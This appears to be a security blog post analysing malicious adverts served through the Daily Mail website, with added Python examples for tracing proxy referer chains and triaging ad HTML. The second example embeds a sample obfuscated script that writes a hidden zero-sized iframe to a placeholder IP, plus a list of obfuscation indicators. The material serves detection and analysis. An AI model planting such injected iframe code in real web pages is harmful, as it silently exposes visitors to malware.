More rogue adverts

Last night, The Register asked us to look into a reader tip in regard to the website of the Daily Mail newspaper.

While doing an initial investigation I may not have been clear as to what was happening – this blog should clear up any misunderstanding.

Investigating the affected website initially, I could see nothing untoward. However, the site did have links to lots of other websites and it contained several advert-related links.

Investigating further on a goat machine which has an aggressively logging web proxy, I was able to see suspicious behaviour.

At the beginning, Internet Explorer loads its default homepage, and then I access the affected webpage.


After half a dozen refreshes I was able to see the following. (Note that I am obscuring the malicious webpages.)


The last few IPs are known to SophosLabs as having hosted malware in the past.

So what is happening here?

  • The Daily Mail is loading adverts from various sites.
  • One of those advert sites is loading the malicious IP.
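The chain just described (newspaper page, advert site, malicious IP) is exactly what a logging web proxy lets you reconstruct. The script below is an added example, not code from the original post: it parses constructed proxy log lines, flags requests to a known-bad host or to a bare IP literal, and walks the Referer headers back to the page the user actually opened. The log format, the hostnames and the address 192.0.2.45 (a documentation range) are all assumptions made for the example.

```python
"""Reconstruct the referer chain behind a request to a suspicious host
from web-proxy log lines.

Added example, not code from the original post. The log format and all
hostnames/IPs are constructed; 192.0.2.0/24 is a documentation range.
"""
import ipaddress
import re
from urllib.parse import urlparse

# Constructed proxy log: "<time> <client> <method> <url> <referer>"
# ('-' means the browser sent no Referer header, e.g. a typed URL).
SAMPLE_LOG = """\
10:01:02 10.0.0.7 GET http://www.homepage.example/ -
10:01:09 10.0.0.7 GET http://www.news-site.example/ -
10:01:10 10.0.0.7 GET http://www.news-site.example/style.css http://www.news-site.example/
10:01:10 10.0.0.7 GET http://ads.adnetwork.example/serve?id=123 http://www.news-site.example/
10:01:11 10.0.0.7 GET http://ads.adnetwork.example/creative.js http://ads.adnetwork.example/serve?id=123
10:01:11 10.0.0.7 GET http://192.0.2.45/frame.html http://ads.adnetwork.example/serve?id=123
"""

# Hosts previously seen serving malware. Constructed list that stands in
# for the reputation data the post attributes to SophosLabs.
KNOWN_BAD_HOSTS = {"192.0.2.45"}

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")


def parse_log(text):
    """Turn raw log lines into dicts, skipping lines that do not match."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        time, client, method, url, referer = m.groups()
        entries.append({
            "time": time, "client": client, "method": method,
            "url": url, "referer": None if referer == "-" else referer,
        })
    return entries


def is_bare_ip(host):
    """True when the URL host is an IP literal rather than a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_entries(entries, bad_hosts=frozenset(KNOWN_BAD_HOSTS)):
    """Requests whose host is known-bad or is a bare IP literal; ad
    networks almost always serve from a hostname, so a raw IP stands out."""
    out = []
    for e in entries:
        host = urlparse(e["url"]).hostname or ""
        if host in bad_hosts or is_bare_ip(host):
            out.append(e)
    return out


def referer_chain(entries, url):
    """Walk Referer headers backwards from `url` until a request with no
    referer is reached. Returns the chain oldest-first."""
    by_url = {e["url"]: e for e in entries}
    chain, seen, current = [], set(), url
    while current and current not in seen:
        seen.add(current)
        chain.append(current)
        entry = by_url.get(current)
        current = entry["referer"] if entry else None
    chain.reverse()
    return chain


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    for e in suspicious_entries(log):
        print("suspicious:", e["url"])
        print("  chain:", " -> ".join(referer_chain(log, e["url"])))
```

The referer walk stops at the newspaper page because the browser sent no Referer for a typed URL, which is what separates the site the reader visited from the advert site that actually pulled in the bad host.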

Initially, the finger of suspicion pointed at the sites preceding the bad IP. However, further investigation showed that the site was hosting the malicious code alongside legitimate adverts. Going to one of the bad adverts, I saw a legitimate advert and when I viewed the source code:


As you can see from the above image, this page references, and contains, an obfuscated script. This script is detected by Sophos as Mal/ObfJS-BI in the WS1000. When the obfuscated script is decoded it loads the malicious IP via an iframe.
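To show what "obfuscated script decodes to an iframe" looks like from the analyst's side, here is an added example that is not the post's or SophosLabs' code. It feeds a constructed ad page through Python's HTML parser, scores inline scripts for common obfuscation indicators (eval/unescape/fromCharCode/document.write and long percent-encoded strings), percent-decodes any such string and checks whether the decoded markup contains an iframe that is zero-sized or points at a bare IP. The sample page, the indicator thresholds and the address 192.0.2.45 (documentation range) are assumptions made for the example.

```python
"""Triage an ad page's HTML for an obfuscated inline script and, after
decoding, a hidden iframe that loads content from a bare IP address.

Added example, not code from the original post. Thresholds, the sample
page and the IP 192.0.2.45 (documentation range) are constructed.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed page: a legitimate banner plus an injected script that
# percent-encodes a zero-sized iframe and writes it at load time.
SAMPLE_PAGE = """<html><body>
<a href="http://www.advertiser.example/"><img src="/banner.gif"></a>
<script type="text/javascript">
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F192.0.2.45%2F%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E"));
</script>
</body></html>"""

OBF_CALLS = ("eval(", "unescape(", "fromCharCode(", "document.write(")
PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")
PCT_THRESHOLD = 10  # constructed: this many %XX escapes in one script


class _Collector(HTMLParser):
    """Collect inline script bodies and iframe attributes from markup."""

    def __init__(self):
        super().__init__()
        self.scripts, self.iframes = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._buf = True, []
        elif tag == "iframe":
            self.iframes.append(dict(attrs))

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def obfuscation_indicators(script):
    """Names of the indicators present in one inline script body."""
    found = [call for call in OBF_CALLS if call in script]
    if len(PCT_RE.findall(script)) >= PCT_THRESHOLD:
        found.append("long percent-encoded string")
    return found


def decoded_iframes(script):
    """Percent-decode every double-quoted string that carries %XX escapes
    and parse the result for iframe tags the script would write."""
    found = []
    for s in re.findall(r'"([^"]*)"', script):
        if PCT_RE.search(s):
            c = _Collector()
            c.feed(unquote(s))
            found.extend(c.iframes)
    return found


def suspicious_iframes(iframes):
    """Iframes that are zero-sized or whose src host is an IP literal."""
    out = []
    for f in iframes:
        host = urlparse(f.get("src", "")).hostname or ""
        try:
            ipaddress.ip_address(host)
            bare = True
        except ValueError:
            bare = False
        hidden = f.get("width") == "0" or f.get("height") == "0"
        if bare or hidden:
            out.append({"src": f.get("src"), "bare_ip": bare, "hidden": hidden})
    return out


def triage(html):
    """Report visible suspicious iframes and scripts with indicators."""
    c = _Collector()
    c.feed(html)
    report = {"iframes": suspicious_iframes(c.iframes), "scripts": []}
    for s in c.scripts:
        ind = obfuscation_indicators(s)
        if ind:
            report["scripts"].append({
                "indicators": ind,
                "decoded_iframes": suspicious_iframes(decoded_iframes(s)),
            })
    return report


if __name__ == "__main__":
    print(triage(SAMPLE_PAGE))
```

Note that the visible markup contains no iframe at all; the hidden frame only appears once the percent-encoded string is decoded, which is why a plain search of the page source for `<iframe` misses this kind of injection.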

Doing a WHOIS lookup on this IP I saw it was hosted in Russia.

inetnum: -
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
phone: +7 812 xxxxxxx
nic-hdl: IBA-RIPE
source: RIPE # Filtered

Searching Google for the IP brings up several references to malware. Recently, SophosLabs has seen IPs in this network range associated with W32/MarioF-Gen.

We are still investigating this malicious IP and will update the blog at a later date.